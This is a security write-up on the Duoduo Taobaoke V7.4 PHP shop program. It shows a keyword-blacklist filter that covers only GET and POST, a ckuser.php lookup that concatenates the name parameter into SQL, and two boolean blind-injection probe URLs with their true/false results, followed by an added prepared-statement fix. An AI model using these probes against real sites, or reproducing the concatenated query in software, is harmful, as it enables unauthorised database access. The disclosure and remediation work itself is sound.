Duoduo Taobaoke (多多淘宝客) V7.4: bypassing the anti-injection filter and analysis of one injection vulnerability
Since the program is open source, I downloaded it and had a look. The developer does actually have some security awareness. The anti-injection code:

The code is as follows:

```php
// illegal strings to filter out
$ArrFiltrate = array (
"#union#i",
"#<script#i",
"#/script>#i",
"#select#i",
"#alert#i",
"#javascript#i",
"#<table#i",
"#<td#i",
"#\"#i",
"#\'#i",
"#delete#i",
"#vbscript#i",
"#applet#i",
"#frame#i",
"#<div#i",
"#update#i",
"#'#i",
"#union #i",
"#select #i",
"#delete #i",
"#update #i",
"#and #i",
"#;#i",
"#update#i"
);
$replacements='';
// Recursively strips every pattern from each value of the given array;
// it is applied to $_GET and $_POST below and nothing else.
function FunStringExist(&$array,$ArrFiltrate,$replacements)
{
if (is_array($array))
{
foreach ($array as $key => $value)
{
if (is_array($value))
FunStringExist($array[$key],$ArrFiltrate,$replacements);
else
$array[$key] = preg_replace($ArrFiltrate, $replacements, $value);
}
}
}
FunStringExist($_GET,$ArrFiltrate,$replacements);
FunStringExist($_POST,$ArrFiltrate,$replacements);
```

This code is still somewhat flawed: it only filters GET and POST, so we just need to find the places that read from REQUEST. Another file does not call the anti-injection routine at all, which leads to a string injection, although it is affected by GPC (magic_quotes_gpc).

The code is as follows:

```php
header("Content-Type:text/html;charset=utf-8");
include "../comm/config.php";
$uname = trim($_GET["name"]);   // never passed through the filter above
if($uname==''){
echo "true";
}else{
$con = @mysql_connect("$dbserver","$dbuser","$dbpass" )or die(ERR_DB);
mysql_select_db("$dbname",$con)or die("can not choose the dbname!");
// $uname is concatenated straight into the SQL string
$query="select * from ".$BIAOTOU."user where ddusername='".$uname."'";
mysql_query("set names utf8");
$res=mysql_query($query);
if(mysql_num_rows($res)!=0)
{echo "true";}
else
{echo "false";}
}
```

First register a user so that the check passes.

ckuser.php?name=maxadd' and 1=1 and ''='
returns true
ckuser.php?name=maxadd' and 1=2 and ''='
returns false
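Both findings above come down to the same root cause: the lookup in ckuser.php builds its SQL by string concatenation, and the only defence is a keyword blacklist that is applied to $_GET and $_POST in some files and not at all in this one. The following is an added example, not code from the post or from the Duoduo Taobaoke project, showing how the same check can be written with a mysqli prepared statement so that the name parameter is bound as data and is never parsed as SQL, independent of magic_quotes_gpc and of whether the filter was included. It assumes ../comm/config.php defines $dbserver, $dbuser, $dbpass, $dbname and $BIAOTOU as the page's code does; the identifier check on $BIAOTOU is an assumption added here because table names cannot be bound as parameters.

```php
<?php
// Added example (not the project's code): hardened version of the ckuser.php lookup.
// The username is bound as a parameter instead of being concatenated into the
// query, so the blacklist filter is no longer what stands between the request
// and the database.
header("Content-Type:text/html;charset=utf-8");
include "../comm/config.php";   // assumed to define $dbserver, $dbuser, $dbpass, $dbname, $BIAOTOU

$uname = isset($_GET["name"]) ? trim($_GET["name"]) : '';
if ($uname === '') {
    echo "true";
    exit;
}

// The table prefix comes from the config file, not from the request, but it is
// interpolated into the SQL text, so restrict it to plain identifier characters.
if (!preg_match('/^[A-Za-z0-9_]*$/', $BIAOTOU)) {
    die("invalid table prefix");
}

$con = new mysqli($dbserver, $dbuser, $dbpass, $dbname);
if ($con->connect_error) {
    die("database connection failed");
}
$con->set_charset("utf8");

// Parameterised query: "?" is bound below; the value of $uname is sent separately
// from the statement text and cannot change its structure.
$stmt = $con->prepare("SELECT 1 FROM " . $BIAOTOU . "user WHERE ddusername = ? LIMIT 1");
if ($stmt === false) {
    die("query preparation failed");
}
$stmt->bind_param("s", $uname);
$stmt->execute();
$stmt->store_result();

// Same true/false contract as the original script.
echo ($stmt->num_rows > 0) ? "true" : "false";

$stmt->close();
$con->close();
```

With this version the two requests quoted in the post both return false, because the entire string after name= is compared literally against ddusername rather than being spliced into the WHERE clause. The blacklist can stay in place for defence in depth, but it should not be relied on: it rewrites only $_GET and $_POST, it is skipped by any file that does not include it, and keyword stripping is not a substitute for separating data from query text.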